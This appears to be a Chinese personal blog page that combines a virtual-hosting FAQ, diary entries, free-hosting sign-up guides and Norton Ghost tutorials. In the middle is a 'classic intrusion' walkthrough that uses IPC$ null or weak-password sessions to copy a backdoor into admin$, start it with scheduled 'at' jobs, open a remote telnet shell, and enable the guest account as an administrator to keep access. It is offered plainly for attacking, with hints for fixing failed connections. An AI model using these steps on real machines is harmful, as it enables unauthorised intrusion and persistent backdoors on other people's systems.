Y's Blog

这篇文章总结了与虚拟主机有关的大部分问题。

　　什么是虚拟主机，为什么要使用虚拟主机?

　　虚拟主机(Virtual Host Virtual Server)是使用特殊的软硬件技术，把一台计算机主机分成一台台'虚拟'的主机，每一台虚拟主机都具有独立的域名和IP地址(或共享的IP地址)，具有完整的Internet服务器功能。在同一台硬件、同一个操作系统上，运行着为多个用户打开的不同的服务器程序，互不干扰;而各个用户拥有自己的一部分系统资源(IP地址、文件存储空间、内存、CPU时间等)。虚拟主机之间完全独立， 在外界看来， 每一台虚拟主机和一台独立的主机的表现完全一样。

　　虚拟主机技术的出现，是对Internet技术的重大贡献，是广大Internet用户的福音。由于多台虚拟主机共享一台真实主机的资源，每个用户承受的硬件费用、网络维护费用、通信线路的费用均大幅度降低，Internet真正成为人人用得起的网络!现在，几乎所有的美国公司(包括一些家庭)均在网络上设立了自己的WEB服务器，其中有相当的部分采用的是虚拟主机!

　　虚拟主机能干什么?

　　我公司提供的虚拟主机服务可以支持最先进的技术如PHP、CGI、数据库挂接等。用户可以通过浏览器轻松管理网站:

　　a) 按要求生成各类统计报告，网站访问统计、各类日志等等。

　　b) 自行备份以及恢复网站数据(包括数据库)。

　　c) 创建自己的邮件账户、以及邮件列表。

　　d) 轻松的通过Frontpage2000以及Dreamweaver修改自己的页面

　　什么是CGI程序?

　　CGI 是 Common Gateway Interface 的缩写，是服务器端和用户沟通的程序， 它可以使你的网页更生动，网络上很多工具例如搜索引擎、留言板、BBS等都是 CGI 程序。CGI的文件名后缀是.cgi 或 .pl 。

　　在虚拟主机上可以运行CGI程序吗?

　　可以，支持Perl、C、C++、JAVA等语言写成的CGI程序。同时，我们还将免费提供给你很多现成的常用CGI程序供你使用，如BBS，网上订单，计数器。

　　什么是web空间?

　　WEB空间即为存放网站页面内容的空间。

　　什么是log?

　　用户的虚拟主机在工作时，时刻将WWW访问的结果记录在一些log(日志)文件中，它们记录了 什么时间、什么客户访问了什么文件、是否传送成功等信息，但这些信息一条一条的数目很大，用户难以直接从log文件获得直观的结果，为此，我们在服务器上安装了先进的访问统计软件，它对用户的log文件进行处理之后，获得诸如:在过去的一段时间内(如一周、一个月)，用户的虚拟主机接受过多少此访问、来自何处的人访问的次数最多、哪些内容被访问的次数最多、每天的情况如何、每天几点钟访问得最多等等有用的信息，还可以通过彩色的立体直方图将结果显示出来。

　　使用虚拟主机有什么限制?

　　您主要在以下方面注意规范虚拟主机的使用:使用本公司提供的虚拟主机，以下行为是不允许的:散布不受欢迎的电子邮件(SPAMing)或在新闻组进行不妥的言论发布;运行与WEB服务器无关的程序或进程，包括IRC、NEWSGROUP及其他;进行编译(Compile)工作;进行政治宣传和散布色情的和内容;进行任何试图改变系统的配置或破坏系统安全的事情。不使用聊天室，在线游戏，江湖等占用系统资源过大的程序。

　　我用CuteFTP连接上主机后，无法列出目录，出现socket提示是什么原因造成的?

　　通过FTP软件登录主机时，状态窗口中出现如下错误:f

　　'STATUS:> Connecting data socket...

　　ERROR:> Failed to establish data socket'

　　一般出现此问题的原因是客户端网络出口与服务器端防火墙的端口设置冲突造成的，您可在FTP软件的设置中将PASV模式设置(一般为默认)选项取消即可。

　　我的虚拟主机开通后应做哪些方面的工作?

　　您的虚拟主机开通后应该按以下步骤操作:

　　a) 上传网页。

　　b) 域名解析 : 如果您的主机域名DNS是在我公司申请的，主机开通时系统己自动帮您设置了域名解析(包括WWW、FTP); 但如果您的主机域名DNS不在我公司，则需请您与域名解析服务商联系做域名解析事宜。

　　什么是静态IP?

　　静态IP就是独立的IP。

　　My SQl数据库具体内容包括什么?

　　a) 概念;mysql是一个可用于各种流行的操作系统平台的关系数据库系统(关系数据库RDBMS是许多环境中的一个基本的工具，从商务，研究和教育环境中的许多传统应用程序到诸如互联网上的搜索引擎这样的应用程序都要使用关系数据库)他具有客户机/服务器体系结构的分布式数据库关系提供。

　　b) 特点:MYSQL具有功能强，使用简单，管理方便，运行速度快，可靠性高，安全保密等特点。

　　c) 作用:数据库的主要功能只在组织和管理很庞大或复杂的信息和基于WEB的库存查询请求不仅仅为客户提供信息，而且还可以为您自己使用数据库可以提供如下功能:

　　一)减少记录编档的时间

　　二)减小记录检索时间

　　三)灵活的查找序列

　　四)灵活的输出格式

　　五)多个用户同时访问记录

　　虚拟主机采用什么操作系统?

　　目前使用最多的操作系统是Unix和微软的WindowsNT，两者各有所长。如果你觉得在Unix和NT之间很难选择，就不要犹豫地选择Unix。

　　什么是SPAM?

　　SPAM是指在Internet上利用Email进行广播式的广告宣传的行为。这种行为给很多人的信箱里塞入大量无关或无用的信息，因此越来越受到人们的厌恶，在美国这已经属非法行为。

　　什么是匿名FTP?

　　匿名FTP是指在登录FTP服务器时，用户名采用'anonymous'，口令为自己的Email地址就可以登录。可以看出，匿名FTP对任何用户都是敞开的，但登录后用户的权限很低，一般只能从服务器下传文件，而不能上传或修改服务器上的内容。它可以有效地帮助网站的拥有者提供文件或软件供Internet上的用户下传。

　　什么是访问统计报告?

　　用户的'虚拟主机'在工作时，时刻将WWW访问的结果记录在一些log(日志)文件中，它们记录了什么时间、什么客户访问了什么文件、是否传送成功等信息，但这些信息一条一条的数目很大，用户难以直接从log文件获得直观的结果。为此，我们在服务器上安装了先进的访问统计软件，它对用户的log文件进行处理之后，获得诸如:在过去的一段时间内(如一周、一个月)，用户的'虚拟主机'接受过多少次访问、来自何处的人访问的次数最多、哪些内容被访问的次数最多、每天的情况如何、每天几点钟访问得多等等有用的信息，还可以通过彩色的立体直方图将结果显示出来。

　　什么是1U

　　1U等于4.45厘米

　　在虚拟主机上可以运行我的CGI程序吗?

　　可以，支持Perl、C、C++、JAVA等语言写成的CGI程序。同时，我们还将免费提供给你很多现成的常用CGI程序供你使用，如BBS，网上订单，计数器。

　　由于把一台机器的资源分配给若干台'虚拟主机'，每台'虚拟主机'的性能是否会下降?

　　这个问题取决于主机的性能及所开设虚拟主机的数量，如果配置得当，加上采用高带宽的线路，(我们国外、国内服务器的接入带宽分别为:155M，105M)虚拟主机会快于采用较低带宽线路连接的独立主机。每台主机的用户数量我们会控制在一定量的范围内，在充分利用主机的性能同时又能保障户利益。

　　使用虚拟主机有什么限制?

　　以下行为是不允许的:散布不受欢迎的电子邮件(SPAM)或在新闻组进行不妥的言论发布;进行政治宣传和散布色情内容;进行任何试图改变系统的配置或破坏系统安全的事情。由以上行为所引起的问题我们将移交公安部门处理。

　　上传网页时需注意些什么问题?

　　a) 网站的默认首页应该是index.htm,index.asp(win2000主机),index.php(Linux主机)均可;

　　b) 最近有部分用户违反我司规定，往服务器上上传聊天室和在线游戏等程序，给我司的服务器维护及其他虚拟主机用户的权益带来了很大的不便，现特申明:虚拟主机用户擅自上传的聊天室和在线游戏等程序一经我们发现，将一律给予删除，对屡次上传这些程序的用户，我们保留锁定其上传帐号和关闭其网站的权利;

　　c) 本服务器上提供有jmail和SA-FileUP组件，不提供其他组件，如果您有其他问题，请和系统管理员联系;

　　d) 如果您在上传时碰到任何问题，请您及时与支持信箱联系:support@dsh.cn

　　为什么文件已经上传，但无法显示网站内容呢?

　　虚拟主机所设定的默认文档为index.htm及index.asp，如果您所上传首页文件名与此不符，则输入域名后无法直接访问。您可通过ftp软件修改您的默认文档的文件名，以实现正常的访问。

　　虚拟主机支持BBS论坛?

　　可以使用WWW方式的BBS论坛。

　　两个域名共用空间和一个域名指向另一个域名的空间有什么不同?

　　共用空间的前提条件是其中一个域名的虚拟主机空间在我司的服务器上。

　　多个域名可以共用一个虚拟主机吗?我们的域名都在贵处申请的,请提供具体的方法。

　　多个域名可以共用一个虚拟主机。只要这些域名的域名服务器(DNS)都是本公司提供的，虚拟主机是在本公司开设的就可以实现，每个域名访问的结果是一样的主页面，这项服务免费。

　　access数据库(mdb文件)无法上传，而其他文件却可以上传，是什么原因?

　　原因是您的网站中有个同名的mdb文件，而此时正被打开，覆盖上传时当然会出错。

　　解决办法:先将该网站的web停掉(您可以在虚拟主机管理中停止，或联系我们帮您停止)，然后再上传就可以了。上传成功后不要忘记打开web服务。

相关命令

　　建立空连接　　net use $Content$nbsp">\\IP\ipc$Content$nbsp;"" /user:"" (一定要注意:这一行命令中包含了3个空格)

　　建立非空连接　　net use $Content$nbsp">\\IP\ipc$Content$nbsp;"用户名" /user:"密码" (同样有3个空格)

　　映射默认共享　　　　net use z: $Content$nbsp">\\IP\c$Content$nbsp;"密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

　　如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: $">\\IP\c$

　　删除一个ipc$连接　　net use $Content$nbsp;/del">\\IP\ipc$Content$nbsp;/del

　　删除共享映射　　net use c: /del 删除映射的c盘，其他盘类推

　　net use * /del 删除全部,会有提示要求按y确认

　　经典入侵模式

　　1.C:\>net use $Content$nbsp">\\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators"

　　这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

　　2. C:\>copy srv.exe $Content$nbsp">\\127.0.0.1\admin$Content$nbsp;

　　先复制srv.exe上去，在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了)。

　　3.C:\>net time \\127.0.0.1

　　查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

　　4.C:\>at \\127.0.0.1 11:05 srv.exe

　　用at命令启动srv.exe吧(这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵!)

　　5.C:\>net time \\127.0.0.1

　　再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

　　6.C:\>telnet 127.0.0.1 99

　　这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

　　虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

　　7.C:\>copy ntlm.exe $Content$nbsp">\\127.0.0.1\admin$Content$nbsp;

　　用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

　　8.C:\WINNT\system32>ntlm

　　输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

　　9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

　　为了以防万一,我们再把guest激活加到管理组

　　10.C:\>net user guest /active:yes

　　将对方的Guest用户激活

　　11.C:\>net user guest 1234

　　将Guest的密码改为1234,或者你要设定的密码

　　12.C:\>net localgroup administrators guest /add

　　将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

　　ipc$与空连接,139,445端口,默认共享的关系

　　以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

　　ipc$与空连接

　　不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

　　许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

　　ipc$与139,445端口

　　ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

　　ipc$与默认共享

　　默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

　　ipc$连接失败的原因

　　以下5个原因是比较常见的:

　　1)你的系统不是NT或以上操作系统;

　　2)对方没有打开ipc$默认共享

　　3)对方未开启139或445端口(惑被防火墙屏蔽)

　　4)你的命令输入有误(比如缺少了空格等)

　　5)用户名或密码错误(空连接当然无所谓了)

　　另外,你也可以根据返回的错误号分析原因:

　　错误号5，拒绝访问 : 很可能你使用的用户不是管理员权限的，先提升权限;

　　错误号51，Windows 无法找到网络路径 : 网络有问题;

　　错误号53，找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

　　错误号67，找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$;

　　错误号1219，提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$，请删除再连。

比别人迟了一个月,都八月中了,学校才放假.不过当在火车上,看着窗外的景色,心情不禁就好起来.

不过,不幸的是回家的必经之路正在整修,所以下火车后做车回家就变成一件难事了.

回家了，真的很开心.可是,刚回家就开始拉肚子~!郁闷了.还很严重.去看了医生,开了中药.希望能快好起来.

我回来才3天,好朋友姬文健就要走了.看来这个假期也没有什么活动了.

Kostenloses Webhosting5:
» Ohne Speicher- oder Trafficlimit.
» 5 mal: FTP, PHP5 & MySQL5.
» Eigene Domains aufschaltbar.
» Externes Verlinken möglich.
» Downloads erlaubt.
» Per Klick anmelden - per Klick abmelden.
» Alles sofort verfügbar (keine Punkte, Freischaltungsposts etc. erforderlich), 100% kostenlos und werbefrei!

申请：http://www.pytal.de/pytal2/register.html
演示：http://free.pytalhost.com/phpinfo.php

申请功略：
Benutzername:   用户名  不少于5位但不多于15位
eMail:     电子邮件
Wiederholung:      重复电子邮件
   
Vorname:    名字
Nachname:     姓
Geschlecht:    性别  选第一个是男，第二个是女
Geburtstag:     生日
Beispiel: 27.03.1985   例子： 27.03.1985
Postleitzahl:     邮政编码  德国的这里找：http://www.greenjobs.de/angebote/20000_39999.html
   
Ich akzeptiere diese Regeln.    我接受这些规则  前面打钩

点 Anmelden 确定

看见页面上方有绿色的 Ihre Anmeldung war erfolgreich. Wir haben ihnen an die angegebene eMail-Adresse eine Willkommens-Mail mit ihrem Passwort zugeschickt. 就表示申请成功了，去收邮件吧。

此时，您已经成功申请到了一个帐户，用这个帐户可以自己开通任意多个空间
用邮件中收到的信息登录控制面板 http://www.pytal.de
点页面上方的 Mein Pytal
然后在左边找到 Webhosting 点击进入
会看见有两个选择，1.用他提供的子域名，2.用自己的域名
添加后进入下列选项
   ID Subdomain/Domain FTP PHP MySQL Statistiken
X  18318 mmcn.be         Nein Nein Nein       ---  

点这三个Nein Nein Nein逐一开通FTP PHP MySQL
Datenbank:  
aktivieren  选这个是开通
deaktivieren 选这个是关闭
Password:  密码
Wiederholung: 重复密码
用户名是自动分配的，你可以在右边看到
点 Andern 确定，然后在页面上方可以看见绿色的如 Die MySQL-Datenbank wurde erfolgreich eingerichtet. 字样

开通相应功能后的例子
   ID Subdomain/Domain FTP PHP MySQL Statistiken
X  18318 mmcn.be           Ja  Ja  Ja    

众所周知，Ghost可以快速地备份与恢复硬盘数据，如果硬盘上的操作系统瘫痪、数据丢失了，你可以用Ghost快速地恢复，免去了重新安装系统和各种软件的烦恼。其实Ghost实在算得上是一款功能强大的软件，除了常规的备份、恢复数据之外，还有许多功能。

   一、用Ghost快速格式化大分区

   如今硬盘的容量是越来越大，每次对大分区进行Format时，都要花费很多时间，其实Ghost可以对大分区进行快速格式化。

   首先在硬盘上划分一个很小的分区(例如40MB)，然后用Format命令对这个分区格式化，注意以后不要在该分区上存放任何文件；接下来用DOS启动盘重启电脑，运行Ghost，选择菜单“Local→Disk→To Image”，将这个分区制作成一个GHO映像文件，存放在其他分区中。

   以后需要格式化某个大分区时，即可用DOS启动盘重启电脑，运行Ghost，选择菜单“Local→Disk→From Image”，选中上述制好的GHO镜像文件，选择要格式化的大分区，按下OK键，最后再按YES键即可。

   二、用Ghost整理磁盘碎片

   用Ghost备份硬盘分区时，Ghost会自动跳过分区中的空白部分，只把其中的数据写到GHO映像文件中。恢复分区时，Ghost会把GHO文件中的内容连续地写入分区中，这样分区的头部都写满了数据，不会夹带空白，因此分区中原有的碎片文件也就自然消失了。

   Ghost整理磁盘碎片的步骤是先用Scandisk扫描、修复要整理碎片的分区，然后使用DOS启动盘重启机器，进入DOS状态，在纯DOS模式下运行Ghost，选择“Local→Disk→To Image”，把该分区制成一个GHO映像文件；再将GHO文件还原到原分区即可。

   注意：在还原GHO映像文件时一定要选对分区，否则会覆盖原来的分区，造成数据的丢失。

   三、用Ghost同时给多台PC克隆硬盘

   Ghost8.0在原来一对一的克隆方式上，增加了一对多的恢复方式，能够透过TCP/IP网络，把一台PC硬盘上的数据同时克隆到多台PC的硬盘中，而且还可以选择交互或批处理方式，这样你就可以给多台电脑同时安装系统或者升级，节省了时间。不过，目前网上免费下载的都为试用版本(即单机版)，不支持“LPT”和“NetBios”的网络克隆功能，正式的Ghost网络版才拥有该功能。

   四、给ghost文件加密码

   对备份文件进行加密其实也不是什么难事，在Ghost后加上相应的参数就可以完成。在启动Ghost时，在其后面加上参数“ghost -pwd”，这样启动的Ghost和平常没有什么两样，只是在输入备份文件名后会有所不同。此时会提示你输入保护密码(图3)，输入完毕后还会让你重复输入确认，若两次输入密码不相同，会让你重新输入。

   接下来的工作和平时一样，这样你就完成了对备份文件的加密。在进行恢复时，当你选择加密的备份文件后，会提示你输入密码，只有输入正确的密码才能进入下一步，然后你就可以按照平时的操作进行系统恢复了。如果你觉得这样输入密码太麻烦，那么你可以在命令行中直接输入密码，例如“ghost -pwd=你所设置的密码”，这样在恢复的过程中就不会再提示你输入密码了。

   五、减少Ghost文件大小

   Ghost为我们在系统出现问题的时候，快速恢复系统提供了很大的方便，但有的朋友的Ghost文件有点大，怎么样来减少ghost镜像文件的体积呢？我们可以从以下几点来做。

   1、在进行ghost镜像文件前，要删除Windows\Temp文件夹下的所有文件，同时可以使用系统清理软件进行垃圾文件清理。

   2、在做ghost镜像文件前，对于win98操作系统可以在DOS下删除windows文件夹中的win386.swp文件；对于WinME操作系统可以删除C盘下的_restore文件夹及其内容。

    3、进行Ghost操作时，可以采用压缩方式来有效的缩减ghost镜像文件的体积。

   六、几秒钟格式化120G大硬盘

   由于Ghost具有克隆整块硬盘的功能，在还原备份时，Ghost会对目标盘按照被克隆硬盘的分区比例重新分配并复制文件。如果是新硬盘还将事先自动完成格式化。按照上述的原理，可用一块已分区格式化好的硬盘为“模板”(该硬盘不装任何文件)，利用Ghost备份并还原到新硬盘上，这样就能快速对大硬盘分区格式化了。具体做法：找一块任意容量大小的硬盘，对它用Fdisk、Format按照你想要对大硬盘分区的比例分区格式化好，注意不要在上面安装任何文件；然后用带有Ghost程序的启动盘启动计算机，运行Ghost，利用“Local-Disk-To Image”命令将刚刚分区格式化好的硬盘镜像成一个软件，把这个文件保存在启动盘上(放心，这个文件应该很小)，并起个名字如myfdisk.gho；接着，在启动盘上制作一个DOS批处理文件(用edit命令可编辑)，内容为：ghost.exe-clone,mode=load,src=a:myfdisk.gho,dst=1，把它保存成bat文件，并起个名字如myfdisk.bat。这样以后哪个硬盘要分区格式化，用这张启动盘启动电脑，然后执行myfdisk.bat，用不了一分钟，不论多大的硬盘都可以顺利完成分区和格式化了。如果你想改变分区比例，只要修改myfdisk.bat文件就可以了，如分了4个区并想把比例变为1∶3∶3∶3，只需修改myfdisk.bat内容为：“ghost.exe-clone,mode=load,src=a:myfdisk.gho,dst=1,size1=10P,size2=30P,sze3=30P,sze4=30P”即可。

   七、为Ghost找个中文伴侣

   Ghost中文伴侣是一款针对Ghost开发的辅助软件。它可以将所有的Ghost设置转移到我们所熟悉的Windows环境下完成。无论是新手还是老鸟都会发现，Ghost的使用原来很简单！

   Ghost中文伴侣的最新版本为3.0，用户可以从各大下载网站得到它。它的安装十分简单：只要接受协议，再选择安装路径就可以了，安装完成后它会在桌面建立一个快捷方式。

   该软件是绿色软件，不会在注册表和Windows系统目录下添加任何文件。卸载时只需将桌面快捷方式、开始菜单中的“Ghost中文伴侣”程序组及程序所在目录(默认情况下为D ＼comghost)直接删除即可。

   步骤1双击桌面上的“Ghost中文伴侣”图标后，程序会打开一个界面，要求用户指定Ghost.exe的位置。

   步骤2选择好Ghost.exe的位置后，单击“确定”按钮，进入如图所示的界面。先选择欲备份的硬盘分区，一般是第1块硬盘上的第1个分区，如果用户有多块硬盘，需要注意物理硬盘与对应的逻辑盘符之间的关系。接下来选择压缩率，一般选择“中等压缩”即可。

   步骤3在“备份到镜像文件”后面可以设置镜像文件保存的位置与文件名，如I:SYSTEM.gho。在“附加说明”中可以为该镜像文件添加一些说明，不过不能超过20个字。下方的备份时间是当前的系统日期和时间，在备份命令或恢复命令执行时会显示。

   步骤4接下来在“备份和恢复命令”下面选择镜像文件的保存位置。在本例中以“命令保存到硬盘上”为例：单击该按钮后，Ghost中文伴侣即会将生成的命令文件及位置显示在下方的对话框。其中，beifen.bat和huifu.bat两个文件位于最后一个分区根目录下。在指定保存镜像文件的目录下还会生成一份“镜像名+说明文件”的文本文件。beifen.bat用于在DOS下执行完成备份操作，huifu.bat用于当系统出现问题时恢复系统，说明文件只是镜像文件的说明，避免日后遗忘。

   步骤5设置完毕后如果“错误提示区”没有提示任何错误，就可以直接按右上角的退出按钮退出设置。如果有错误提示，请按提示重新进行设置。

   步骤6备份系统时，首先启动到纯DOS下，进入硬盘的最后一个分区，在命令提示符下输入“beifen.bat”，确认无误后按“Y”即可开始备份。如果是恢复系统，输入“huifu.bat”就可以了，整个操作过程是全中文界面。

   如果用户不小心删除了这两个文件，无需重新制作。进入Ghost中文伴侣所在文件夹下的Lastime目录，你会发现“beifen.bat”和“huifu.bat”都乖乖地躲在里面呢！

   八、Ghost问题解答区

   问：我在用Ghost重做系统时，提示以下错误：(29007)write sector failure　result＝1　drive＝128　sector7661 808 to 766109。这是什么原因？

   答：这是“写错误”的提示，需要进行磁盘扫描。

   问：我的电脑使用的是SATA(串行)硬盘，但Ghost在DOS下无法启动。请问如何解决？

   答：Ghost从7.7版开始就有Win 32的版本了，如果想做SATA硬盘的镜像，挂上一个安装有Windows 2000以上系统的硬盘(IDE或SATA的硬盘都可以)。安装SATA的驱动，利用Ghost32.exe就可以在Windows下对另一块SATA硬盘做镜像。

   问：请问有没有方法能在DOS下禁用Ghost？

   答：修改Command.com，把“Pause”改成“Ghost”，这样Ghost就成了原来的内部命令“Pause”。当输入Ghost的时候会提示“Press any key to continue”，然后退出。当然了，这样做并不是万无一失的，如果他人用启动盘启动照样能使用Ghost，另外直接输“Ghost.exe”也可运行。

   问：我将自己的C盘做了Ghost备份，希望能尽可能的小些以便于保存，做完后发现.gho文件有724MB，比较大，所以删除了一个C盘中大约有200MB的文件，期望重新镜像后能够把.gho文件减小，结果Ghost后大小竟然还是724MB，请问是什么原因？

   答：你删除的文件可能是Windows的交换文件，是给虚拟内存使用的，本来Ghost就不保存这文件的内容，所以删除与未删除的大小是一样的。

   问：我有3个分区C、D、E，对系统C盘作了Ghost，并把.gho文件放在了D分区，可以对D分区进行碎片整理吗？

   答：最好将备份文件放在一个不常用的分区，甚至单独划分一个，因为进行碎片整理有时会破坏备份文件。

   问：我对自己的Windows XP系统进行了Ghost备份，生成的文件有1.2GB那么大，为了刻录方便，如何分成两个.gho文件，恢复时第一个光盘恢复完就提示插入第二个光盘(要求是：我的硬盘有三个区，只把C盘克隆到D盘上，分两个.gho文件存，每个680MB)。

   答：ghost -clone,dump=pdump,src=1:1 dst=d:\winxp.gho -split=680

   ghost -clone,mode=pdump,src=1:1 dst=d:\winxp.gho -split=680　

   恢复的时候会提示插入第二张盘的

   问：我今天下载了Ghost自动恢复光盘制作文件，但有个问题，ghostcd.ima文件对应不同的操作系统环境是否需要修改？

   答：刻录的时候注意，第一张光盘根目录必须有ghost.exe和win2k.gho两个文件。如果你的镜像文件不是win2k.gho，必须修改ghostcd.ima里面的autoexec.bat的对应项。

   问：我有个SATA 80GB的硬盘，分成了三个区，C盘8GB、D盘60GB，余下的为E盘。我把C盘Ghost到E盘下面，此后Ghost的文件刻到光盘上面，最后我换了一个新硬盘，容量也是80GB，分区一样，可不可以把Ghost的文件向新硬盘上面的C盘恢复呢？恢复时新旧硬盘的C盘必须容量一样大吗？会不会出现其他问题？

   答：分区大于或小于原来的分区都没有问题，只要你源盘的文件能够在目标盘放得下就可以。但也要注意有些兼容性问题，可能会导致克隆后恢复失败。这多是因为装机的时候不法商贩图方便，直接在自己原有的机器上的硬盘或是光盘上找个克隆文件，Ghost数据到新机里，因为硬盘的型号、容量不同以及系统各项设置差异所致。

免费的网通电信自动解析DNS
不再为双线路服务器犯愁
网通电信自动解析
所有功能完全免费！
支持RU/COM/NET/ORG/CN/INFO/BIZ/CC/US的米/
http://www.dnspod.com/

申请地址：http://www.kilu2.de/index.php
演示http://pling.kilu2.de/
此床在三个月前调整了容量和流量，从300M空间月流量1.5G，调整为1G空间月流量99G！！！
单档1.5M
上传速度还不错：35K/秒---40K/秒！！！

忙活了几天,终于把自己所有的家当都收拾完了.打包下来一共7大件.累.

回想一下这学期,也不知道该怎么表达.很是混乱.但,就算这也是一种人生体验吧.不过希望这是唯一的一次了.

因为我不想在做一个逃避的人.不想考试时候,什么都不会.甚至得0分.

到这又想起一件趣事.

一次课堂的测试,我还是什么都不会啊,老师让大家把书全部交上去.我考虑再三,决定不交了.

测试开始,老师在黑板上写题目,我想急忙打开藏在桌内的书,却不小心把书丢在地上,安静的课堂突然发出一声沉闷

响声,老师一转身就死死的盯住了我,我也假装差异的看着他,最后他还是忍不住走下来,并用弯腰的姿势发现了掉在

地上的课本.说到:刚才就看见你没交书,现在既然掉了就别动了.(话是没有什么,但是他那语气和他的凶神扼杀的眼

神让我有想自杀的冲动.

考试快结束了,我还什么都没答呢,邻桌看到,很是义气,把他的答案给我递过来,我狂抄之.但很快就被发现.

"上过课没有?",老师.

"上过啊",我说.

"哦，那我们是星期几的课?"

"1,3,4"我不知道哪里来的答案和勇气,很快就答出了答案,并颇为得意,因为老师表情很稳定,其他同学也没有什么大

的动作,只是私语着什么.

"那今天星期几?"

"星期三",我确实记得今天是星期三.但这个答案引起了所有人喷泪的笑...原来今天星期4.昨天晚上又是通宵上网,我

没睡觉,也就没感觉到一天已经过去.而第一个问题的答案毫无疑问也是错误的...



其实,记下这件事,并不是为了搞笑,而是想提醒自己该清醒清醒了...

是该想想以后该怎么办了,下学期有很多很多事呢,4门挂课还有网工和6级.加油吧.加油吧.

FIGH~~TING!!!!

其中有全能的空间


http://r1015.res.readyserver.net:8080/psoft/servlet/psoft.hsphere.CP
http://cp.lab-ud.com:8080/psoft/servlet/psoft.hsphere.CP
http://r2916.res.hivelocity.net:8080/psoft/servlet/psoft.hsphere.CP


演示
我也不知道哪个是哪个了
http://iter.net.ru
http://www.iter.net.ru
http://myy.net.ru
http://www.myy.net.ru

在很多朋友都想学到网络克隆技术。但是网络上有那么几篇网络克隆的文章，并不是一那么准确。
　　所以这次小申子决定推出傻瓜教程系列第二弹.网络克隆篇。
　　本方法经过实验，绝对通过。而且只要网络好，系统没问题，绝对不会出现问题。
　　恩，好，不多说废话了，现在开始我们的教程。
　　首先.我们做好一张母盘.并将操作系统目录里的TEMP目录里的东西,以及临时文件夹全部清空.之后将母盘系统备份到另外一块硬盘上.
　　首先确认备份的系统有一个比较大的分区.并确认能装下你的硬盘备份.
　　将准备好的另外一块硬盘挂在你做好的机器上.之后重新启动到DOS模式,启动GHOST.
　　选择LOCAL→DISK→TO IMAGE.之后选择你的母盘,按回车

　　选择你你准备好的一个足够大的分区

　　给文件起个名字..按回车

　它会问你压缩方式.选NO是不压缩.FAST是快速压缩.HIGH是高压缩率.
　　由于我选的都是HIGH,而且从来没出过什么问题,在这里也推荐你使用.

　　因为FAT32格式分区最大只能识别2G的文件.所以每到达2G时候,会提示你会重新建立文件.

　　好了,文件建立完了,我们该建立GHOST服务器了.启动WINDOWS打开GHOSTSRV.EXE文件.我们讲在后面提供下载,也可以在GHOST企业版里找到.之后
　　给服务器起一个名字.我起的名字是shenzi
选择克隆客户端
　　之后选择你备份到另外一个硬盘的备份文件.
　　点击 接受客户的按扭

　　好了,现在服务器已经进入接收状态了.

　　之后到客户端,就是你准备要克地机器.在GHOST.EXE文件所在的目录里,创建一个WATTCP.CFG的文件.此文件是指定IP以及网关的.如果没有此文
　　件GHOST会自动扫描DHCP服务器.不推荐使用DHCP服务器.所以我们用DOS的命令,EDIT建立一个WATTCP.CFG的文件吧.
　　在GHOST.EXE所在的目录里输入 edit空格wattcp.cfg

　　好,之后我们建立以下内容
IP=你这台机器所指定的IP.为了避免重复,尽量使用机器号.
　　NETMASK=子网掩玛,根据IP规则设置.
　　GATEWAY=网关.就是建立了GHOST服务器的IP地址.

　　好了,之后驱动网卡.执行RTSPKT空格0X60,0X60是给网卡的一个中断.这里必须给网卡一个中断.否则你也驱动不起你的网卡.我用的中断是0X60.

　　之后进入GHOST.选择MULTICASTING

　它会问你服务器名字.在这里输入你起的服务器名字.按回车

　　选择硬盘.按回车

　　在这里可以重新修改分区大小,如果没有特别要求,选择OK继续.

　　确认开始.选YES

　好了,现在你的客户端已经进入接收状态了.

　　好了,在去GHOST服务器看看把,看你是不是在服务器已经看到了别的机器的IP和MAC地址了呢.
　　等把客户端全部连接上之后,就可以选择开始传送进行网络克隆了.

